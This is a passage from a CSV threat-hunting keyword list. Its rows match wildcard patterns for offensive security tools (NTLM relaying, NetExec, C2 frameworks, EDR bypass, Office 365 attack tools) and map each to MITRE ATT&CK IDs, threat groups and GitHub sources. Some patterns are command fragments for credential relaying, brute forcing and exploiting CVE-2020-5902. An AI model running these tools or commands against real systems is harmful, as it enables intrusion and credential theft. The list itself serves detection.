about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,1,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z -*NTLMRelay2Self.git*,offensive_tool_keyword,NTLMRelay2Self,An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).,T1078 - T1078.004 - T1557 - T1557.001 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/med0x2e/NTLMRelay2Self,1,1,N/A,10,4,349,45,2022-04-30T19:02:06Z,2022-04-30T10:05:02Z -*ntlmrelayx -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ntlmrelayx --*,offensive_tool_keyword,AD exploitation cheat sheet,Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ntlmrelayx.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ntlmrelayx.py.log*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*ntlmscan.py*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,1,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z -*ntlmscan-master.zip*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,1,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z -*ntlmv1.py --ntlmv1 *::*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*ntlmv1.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*ntlmv1_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ntlmv1-multi --ntlmv1 *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*NtoskrnlOffsets.csv*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*NtRemoteLoad-main*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,1,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*ntrights.exe*,offensive_tool_keyword,NtRights,tool for adding privileges from the commandline,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/gtworek/PSBits/tree/master/NtRights,1,1,N/A,7,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*NtUserMNDragOverExploit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*NtWa1tF0rS1ngle0bj3ct Executed*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,0,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -*Nuages*/Implants*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*nuages.clearImplants *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*nuages.getAutoruns*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*nuages.getImplants*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*nuages.getListeners*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*nuages.printImplants*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*nuages.printListeners*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*nuages_cli.js*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*NuagesC2Connector*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*NuagesC2Implant*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*NuagesPythonImplant*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*NuagesSharpImplant*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nuclei -t workflows/bigip-pwner-workflow.yaml*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nuclei -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*nuclei-burp-plugin*,offensive_tool_keyword,Xerror,A BurpSuite plugin intended to help with nuclei template generation.,T1583 T1595 T1190,N/A,N/A,N/A,Network Exploitation tools,https://github.com/projectdiscovery/nuclei-burp-plugin,1,1,N/A,N/A,10,955,102,2023-09-15T10:49:09Z,2022-01-17T10:31:33Z -*Nuke_Privileges /Process:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*NUL0x4C/APCLdr*,offensive_tool_keyword,APCLdr,APCLdr: Payload Loader With Evasion Features,T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/NUL0x4C/APCLdr,1,1,N/A,N/A,3,285,51,2023-01-22T04:24:33Z,2023-01-21T18:09:36Z -*NUL0x4C/AtomLdr*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*null-byte.com/bypass-amsi*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005 ,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*NullSessionScanner.*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://github.com/vletoux/pingcastle,1,1,N/A,N/A,10,1859,249,2023-09-18T17:29:51Z,2018-08-31T17:42:48Z -*nxc ftp *bruteforce*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc http *--port*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc ldap * --admin-count*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc ldap * --trusted-for-delegation*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc mssql *--get-file*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc mssql *--local-auth*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc ssh *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc winrm * -X *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nysm.skel.h*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*nysm-master.zip*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,1,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*nyxgeek*,offensive_tool_keyword,Github Username,github user hosting exploitation and recon tools,N/A,N/A,N/A,N/A,Information Gathering,https://github.com/nyxgeek,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nyxgeek/lyncsmash*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*nyxgeek/ntlmscan*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,1,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z -*nyxgeek/teamstracker*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,1,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*-o kitten.exe*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*o_getprivs*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*o365-Attack-Toolkit*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*o365-attack-toolkit*,offensive_tool_keyword,o365-attack-toolkit,A toolkit to attack Office365,T1110 - T1114 - T1119 - T1197 - T1087.002,TA0001 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/mdsecactivebreach/o365-attack-toolkit,1,1,N/A,10,10,954,218,2020-11-06T12:09:26Z,2019-07-22T10:39:46Z -*o365creeper.git*,offensive_tool_keyword,o365creeper,Python script that performs email address validation against Office 365 without submitting login attempts,T1592.002 - T1596,TA0007,N/A,N/A,Network Exploitation tools,https://github.com/LMGsec/o365creeper,1,1,N/A,N/A,3,265,57,2020-08-07T17:40:41Z,2019-07-12T21:32:05Z -*o365creeper.py*,offensive_tool_keyword,o365creeper,Python script that performs email address validation against Office 365 without submitting login attempts,T1592.002 - T1596,TA0007,N/A,N/A,Network Exploitation tools,https://github.com/LMGsec/o365creeper,1,1,N/A,N/A,3,265,57,2020-08-07T17:40:41Z,2019-07-12T21:32:05Z -*o365creeper-master*,offensive_tool_keyword,o365creeper,Python script that performs email address validation against Office 365 without submitting login attempts,T1592.002 - T1596,TA0007,N/A,N/A,Network Exploitation tools,https://github.com/LMGsec/o365creeper,1,1,N/A,N/A,3,265,57,2020-08-07T17:40:41Z,2019-07-12T21:32:05Z -*o365enum.py*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,1,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*o365enum-master*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,1,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*o365recon*,offensive_tool_keyword,o365recon,script to retrieve information via O365 with a valid cred,T1087 - T1074 - T1003 - T1002 - T1552,TA0003 - TA0011 - TA0006,N/A,N/A,Information Gathering,https://github.com/nyxgeek/o365recon,1,1,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*o365recon.git*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,1,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*o365recon.ps1*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,1,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*o365recon-master*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,1,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*oab-parse.py*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*oaburl.py */*:*@* -e *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*obfuscate.py grunt*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Obfuscate.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*obfuscate/shellter*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*obfuscate_cmdlet*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*obfuscate_command*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*obfuscated_module_source/*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 